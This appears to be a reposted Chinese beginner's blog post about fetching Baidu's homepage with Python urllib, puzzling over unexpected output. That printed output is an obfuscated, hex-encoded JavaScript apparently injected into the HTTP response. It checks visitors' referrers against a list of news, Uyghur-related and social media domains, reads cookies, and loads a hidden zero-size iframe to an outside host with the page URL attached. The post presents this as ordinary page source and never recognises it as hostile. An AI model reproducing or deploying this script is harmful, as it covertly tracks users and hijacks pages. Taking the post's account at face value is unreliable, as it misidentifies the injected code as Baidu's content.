python爬虫代码模板_Python:学习Python爬虫的第一天
发布日期:2021-06-24 14:45:04 浏览次数:4 分类:技术文章

本文共 10395 字,大约阅读时间需要 34 分钟。

疑问:

跟着Python教学视频,爬百度首页,结果不同?(代码、结果往下看)

1:

发现本地的IE浏览器打开百度有报错,搜狗浏览器可以正常打开。而且,eclipse执行出来的结果跟在IE浏览器百度首页查看到的源码一样是一样的,360浏览器的源码跟视频里一样的。莫不是,eclipse默认的是IE浏览器的??

2:

修复IE浏览器:url=http://www.baidu.com/  打开仍有报错,url=https://www.baidu.com/  可以正常打开。

eclipse执行还是不对。

3:

换了个url=http://www.kugou.com/ 爬 IE跟搜狗的源代码相同,eclipse的结果还是怪怪的。。。证明跟浏览器无关了。

4:

爬酷狗首页不正确的原因找到了。

其实是对的,只是因为Eclipse Console 默认限制了结果行数(只显示后80000的字符),去掉勾选后,显示正常。

百度。。。还是不知道为什么,换了个电脑效果一样的。

79fc1227f5fe5895594bef3011bc3ef0.png

环境:Python 3.x + eclipse

代码如下:

import re

from urllib import request

url=r"http://www.baidu.com/"

#创建自定义的请求对象

req=request.Request(url)

#发送请求,获取响应信息

response=request.urlopen(req).read().decode('utf-8')

#pat=r"

(.*?)"    #通过正则表达式进行数据清洗

#data=re.findall(pat,response)

print(response)

执行后结果如下:

(function(t,e){function n(){var e;try{e=new XMLHttpRequest}catch(n){for(var c=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.5.0","MSXML2.XMLHTTP.4.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"],o=0;o

c(t,function(t){document.write(t),document.close(); setTimeout(function(){var n1 = document.createElement("script");n1.setAttribute("type","text/javascript");n1.setAttribute("src",e);    (document.head||document.getElementsByTagName('head')[0]).appendChild(n1);},1000);})})('http://www.baidu.com/?t=912558218',"var __encode ='sojson.com', _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var __Ox3e844=["\x6E\x75\x72\x2E\x63\x6E","\x69\x7A\x64\x61\x2E\x63\x6F\x6D","\x62\x61\x64\x61\x6D\x62\x69\x7A\x2E\x63\x6F\x6D","\x75\x71\x75\x72\x2E\x63\x6E","\x75\x6C\x69\x6E\x69\x78\x2E\x63\x6F\x6D","\x65\x79\x6E\x65\x6B\x2E\x6E\x65\x74","\x65\x79\x6E\x65\x6B\x2E\x62\x69\x7A","\x63\x68\x65\x6E\x67\x61\x62\x6C\x65\x2E\x6E\x65\x74","\x78\x6D\x64\x35\x2E\x63\x6F\x6D","\x78\x6D\x64\x35\x2E\x6F\x72\x67","\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D","\x74\x77\x69\x74\x74\x65\x72\x2E\x63\x6F\x6D","\x75\x68\x72\x70\x2E\x6F\x72\x67","\x69\x73\x74\x69\x71\x6C\x61\x6C\x68\x65\x77\x65\x72\x2E\x63\x6F\x6D","\x6D\x61\x61\x72\x69\x70\x2E\x6F\x72\x67","\x74\x72\x74\x2E\x6E\x65\x74\x2E\x74\x72","\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x74\x69\x6D\x65\x73\x2E\x63\x6F\x6D","\x75\x79\x67\x68\x75\x72\x61\x6D\x61\x72\x69\x63\x61\x6E\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x63\x6F\x6E\x67\x72\x65\x73\x73\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x65\x6E\x73\x65\x6D\x62\x6C\x65\x2E\x63\x6F\x2E\x75\x6B","\x75\x79\x67\x68\x75\x72\x69\x73\x74\x61\x6E\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x6A\x61\x70\x61\x6E\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x70\x72\x65\x73\x73\x2E\x63\x6F\x6D","\x75\x79\x67\x68\x75\x72\x79\x61\x72\x2E\x6F\x72\x67","\x75\x79\x68\x65\x77\x65\x72\x2E\x62\x69\x7A","\x75\x79\x6D\x61\x61\x72\x69\x70\x2E\x63\x6F\x6D","\x61\x6B\x61\x64\x65\x6D\x69\x79\x65\x2E\x6F\x72\x67","\x69\x73\x74\x69\x71\x6C\x61\x6C\x2E\x6E\x65\x74","\x69\x75\x68\x72\x64\x66\x2E\x6F\x72\x67","\x6F\x6C\x69\x6D\x61\x6C\x61\x72\x2E\x6F\x72\x67","\x72\x66\x61\x2E\x6F\x72\x67","\x75\x6E\x74\x72\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x6E\x65\x74\x2E\x6F\x72\x67","\x61\x61\x77\x73\x61\x74\x2E\x63\x6F\x6D","\x61\x68\x73\x65\x6E\x64\x65\x72\x2E\x63\x6F\x6D","\x62\x65\x68\x69\x6E\x64\x2D\x62\x61\x72\x73\x2E\x6E\x65\x74","\x62\x65\x73\x74\x67\x6F\x72\x65\x2E\x63\x6F\x6D","\x62\x69\x6C\x69\x71\x69\x7A\x2E\x63\x6F\x6D","\x62\x69\x71\x6C\x65\x2E\x63\x6F\x6D","\x62\x6C\x69\x70\x2E\x74\x76","\x63\x68\x69\x6E\x65\x73\x65\x2E\x75\x68\x72\x70\x2E\x6F\x72\x67","\x63\x68\x69\x6E\x65\x73\x65\x62\x6C\x6F\x67\x2E\x75\x68\x72\x70\x2E\x6F\x72\x67","\x64\x6F\x67\x75\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x62\x75\x6C\x74\x65\x6E\x69\x2E\x63\x6F\x6D","\x64\x6F\x67\x75\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x63\x61\x2E\x74\x72\x2E\x67\x67","\x64\x6F\x67\x75\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x73\x65\x6D\x70\x6F\x7A\x79\x75\x6D\x75\x2E\x63\x6F\x6D","\x64\x6F\x77\x6E\x65\x75\x2E\x6F\x72\x67","\x64\x6F\x77\x6E\x6C\x6F\x61\x64\x64\x61\x69\x6C\x79\x6D\x6F\x74\x69\x6F\x6E\x2E\x63\x6F\x6D","\x65\x61\x73\x74\x2D\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x2E\x74\x76","\x65\x61\x73\x74\x65\x72\x6E\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x67\x6F\x76\x65\x72\x6E\x6D\x65\x6E\x74\x2E\x63\x6F\x6D","\x65\x61\x73\x74\x74\x75\x72\x6B\x65\x73\x74\x61\x6E\x2E\x63\x6F\x6D","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x2D\x67\x6F\x76\x2E\x6F\x72\x67","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x2D\x67\x6F\x76\x65\x72\x6E\x6D\x65\x6E\x74\x2E\x6F\x72\x67","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x63\x63\x2E\x6F\x72\x67","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x67\x6F\x76\x65\x72\x6E\x6D\x65\x6E\x74\x69\x6E\x65\x78\x69\x6C\x65\x2E\x75\x73","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x69\x6E\x66\x6F\x2E\x63\x6F\x6D","\x72\x66\x69\x2E\x66\x72","\x63\x68\x6F\x73\x75\x6E\x2E\x63\x6F\x6D","\x63\x6E\x61\x2E\x63\x6F\x6D\x2E\x74\x77","\x72\x74\x68\x6B\x2E\x68\x6B","\x73\x74\x68\x65\x61\x64\x6C\x69\x6E\x65\x2E\x63\x6F\x6D","\x6F\x72\x69\x65\x6E\x74\x61\x6C\x64\x61\x69\x6C\x79\x2E\x6F\x6E\x2E\x63\x63","\x69\x2D\x63\x61\x62\x6C\x65\x2E\x63\x6F\x6D","\x6D\x69\x6E\x67\x70\x61\x6F\x6D\x6F\x6E\x74\x68\x6C\x79\x2E\x63\x6F\x6D","\x79\x7A\x7A\x6B\x2E\x63\x6F\x6D","\x6E\x65\x78\x74\x6D\x65\x64\x69\x61\x2E\x63\x6F\x6D","\x63\x68\x69\x6E\x65\x73\x65\x70\x65\x6E\x2E\x6F\x72\x67","\x62\x6F\x78\x75\x6E\x2E\x63\x6F\x6D","\x6D\x69\x6E\x67\x6A\x69\x6E\x67\x6E\x65\x77\x73\x2E\x63\x6F\x6D","\x62\x65\x69\x6A\x69\x6E\x67\x73\x70\x72\x69\x6E\x67\x2E\x63\x6F\x6D","\x6D\x73\x67\x75\x61\x6E\x63\x68\x61\x2E\x63\x6F\x6D","\x62\x6F\x74\x61\x6E\x77\x61\x6E\x67\x2E\x63\x6F\x6D","\x77\x72\x63\x68\x69\x6E\x61\x2E\x6F\x72\x67","\x6F\x70\x65\x6E\x2E\x63\x6F\x6D\x2E\x68\x6B","\x61\x62\x6F\x6C\x75\x6F\x77\x61\x6E\x67\x2E\x63\x6F\x6D","\x36\x70\x61\x72\x6B\x2E\x63\x6F\x6D","\x63\x72\x65\x61\x64\x65\x72\x73\x2E\x6E\x65\x74","\x77\x65\x6E\x78\x75\x65\x63\x69\x74\x79\x2E\x63\x6F\x6D","\x73\x69\x6E\x6F\x76\x69\x73\x69\x6F\x6E\x2E\x6E\x65\x74","\x68\x61\x76\x65\x38\x2E\x74\x76","\x70\x6F\x70\x79\x61\x72\x64\x2E\x6F\x72\x67","\x6D\x69\x74\x62\x62\x73\x2E\x63\x6F\x6D","\x6F\x7A\x63\x68\x69\x6E\x65\x73\x65\x2E\x63\x6F\x6D","\x79\x6F\x72\x6B\x62\x62\x73\x2E\x63\x61","\x77\x65\x73\x74\x63\x61\x2E\x63\x6F\x6D","\x74\x6F\x6B\x79\x6F\x63\x6E\x2E\x63\x6F\x6D","\x31\x36\x33\x2E\x63\x6F\x6D","\x71\x71\x2E\x63\x6F\x6D","\x69\x66\x65\x6E\x67\x2E\x63\x6F\x6D","","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x74\x6F\x70","\x6C\x6F\x67","\x70\x61\x72\x65\x6E\x74","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x6C\x65\x6E\x67\x74\x68","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x69\x6D\x6D\x6F\x72\x74\x61\x6C\x5F","\x65\x72\x72\x6F\x72","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x72\x6F\x70\x73\x2E\x61\x71\x66\x65\x6E\x2E\x63\x6F\x6D\x2F\x61\x64\x76\x65\x72\x74\x69\x73\x65\x2F\x70\x75\x62\x6C\x69\x63\x2F\x3F\x73\x79\x73\x64\x61\x74\x61\x3D","\x26\x68\x6F\x73\x74\x3D","\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72","\x68\x65\x69\x67\x68\x74","\x77\x69\x64\x74\x68","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x64\x72\x6F\x70\x73\x2E\x61\x71\x66\x65\x6E\x2E\x63\x6F\x6D\x2F\x61\x64\x76\x65\x72\x74\x69\x73\x65\x2F\x70\x75\x62\x6C\x69\x63\x2F\x3F\x73\x79\x73\x64\x61\x74\x61\x3D","\x22\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x77\x72\x69\x74\x65"];var stander_url= new Array(__Ox3e844[0x0],__Ox3e844[0x1],__Ox3e844[0x2],__Ox3e844[0x3],__Ox3e844[0x4],__Ox3e844[0x5],__Ox3e844[0x6],__Ox3e844[0x7],__Ox3e844[0x8],__Ox3e844[0x9],__Ox3e844[0xa],__Ox3e844[0xb],__Ox3e844[0xc],__Ox3e844[0xd],__Ox3e844[0xe],__Ox3e844[0xf],__Ox3e844[0x10],__Ox3e844[0x11],__Ox3e844[0x12],__Ox3e844[0x13],__Ox3e844[0x14],__Ox3e844[0x15],__Ox3e844[0x16],__Ox3e844[0x17],__Ox3e844[0x18],__Ox3e844[0x19],__Ox3e844[0x1a],__Ox3e844[0x1b],__Ox3e844[0x1c],__Ox3e844[0x1d],__Ox3e844[0x1e],__Ox3e844[0x1f],__Ox3e844[0x20],__Ox3e844[0x21],__Ox3e844[0x22],__Ox3e844[0x1a],__Ox3e844[0x23],__Ox3e844[0x24],__Ox3e844[0x25],__Ox3e844[0x26],__Ox3e844[0x27],__Ox3e844[0x28],__Ox3e844[0x29],__Ox3e844[0x2a],__Ox3e844[0x2b],__Ox3e844[0x2c],__Ox3e844[0x2d],__Ox3e844[0x2e],__Ox3e844[0x2f],__Ox3e844[0x30],__Ox3e844[0x31],__Ox3e844[0x32],__Ox3e844[0x33],__Ox3e844[0x34],__Ox3e844[0x35],__Ox3e844[0x36],__Ox3e844[0x37],__Ox3e844[0x38],__Ox3e844[0x39],__Ox3e844[0x3a],__Ox3e844[0x3b],__Ox3e844[0x3c],__Ox3e844[0x3d],__Ox3e844[0x3e],__Ox3e844[0x3f],__Ox3e844[0x40],__Ox3e844[0x41],__Ox3e844[0x42],__Ox3e844[0x43],__Ox3e844[0x44],__Ox3e844[0x45],__Ox3e844[0x46],__Ox3e844[0x47],__Ox3e844[0x48],__Ox3e844[0x49],__Ox3e844[0x4a],__Ox3e844[0x4b],__Ox3e844[0x4c],__Ox3e844[0x4d],__Ox3e844[0x4e],__Ox3e844[0x4f],__Ox3e844[0x50],__Ox3e844[0x51],__Ox3e844[0x52],__Ox3e844[0x53],__Ox3e844[0x54],__Ox3e844[0x55],__Ox3e844[0x56],__Ox3e844[0x57]);var sysdata=__Ox3e844[0x58];var url=__Ox3e844[0x58];try{url= window[__Ox3e844[0x5b]][__Ox3e844[0x5a]][__Ox3e844[0x59]]}catch(M){console[__Ox3e844[0x5c]](M);if(window[__Ox3e844[0x5d]]){try{url= window[__Ox3e844[0x5d]][__Ox3e844[0x5a]][__Ox3e844[0x59]]}catch(L){console[__Ox3e844[0x5c]](L);url= __Ox3e844[0x58]}}};if(url=== __Ox3e844[0x58]){url= document[__Ox3e844[0x59]]};if(url=== __Ox3e844[0x58]){url= window[__Ox3e844[0x5f]][__Ox3e844[0x5e]]};function inarray(url,stander_url){for(var _0xf050x5=0;_0xf050x5< stander_url[__Ox3e844[0x60]];_0xf050x5++){if(url[__Ox3e844[0x61]](stander_url[_0xf050x5])!=  -1){return true}};return false}if(!inarray(url,stander_url)){var cookie_str=document[__Ox3e844[0x62]];if(cookie_str[__Ox3e844[0x61]](__Ox3e844[0x63])!=  -1){throw  new Error(__Ox3e844[0x64])}};try{var iframe=document[__Ox3e844[0x66]](__Ox3e844[0x65]);iframe[__Ox3e844[0x67]]= __Ox3e844[0x68]+ sysdata+ __Ox3e844[0x69]+ url;iframe[__Ox3e844[0x6a]]= 0;iframe[__Ox3e844[0x6b]]= 0;iframe[__Ox3e844[0x6c]]= 0;document[__Ox3e844[0x6e]][__Ox3e844[0x6d]](iframe)}catch(e){console[__Ox3e844[0x5c]](e);document[__Ox3e844[0x71]](__Ox3e844[0x6f]+ sysdata+ __Ox3e844[0x69]+ url+ __Ox3e844[0x70])}");

转载地址:https://blog.csdn.net/weixin_33443932/article/details/113984545 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!

上一篇:springboot获取原生js请求_springboot跳转原生html
下一篇:python导出csv不带引号的句子_不带双引号写入CSV文件

发表评论

最新留言

逛到本站,mark一下
[***.202.152.39]2024年04月17日 13时14分40秒